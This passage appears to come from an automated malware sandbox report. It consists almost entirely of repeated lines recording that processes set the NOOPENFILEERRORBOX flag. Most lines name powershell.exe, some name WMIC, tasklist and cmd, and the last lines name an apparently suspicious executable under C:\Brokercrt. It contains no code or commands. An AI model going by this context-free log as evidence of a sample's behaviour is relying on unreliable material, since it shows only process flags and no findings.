                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
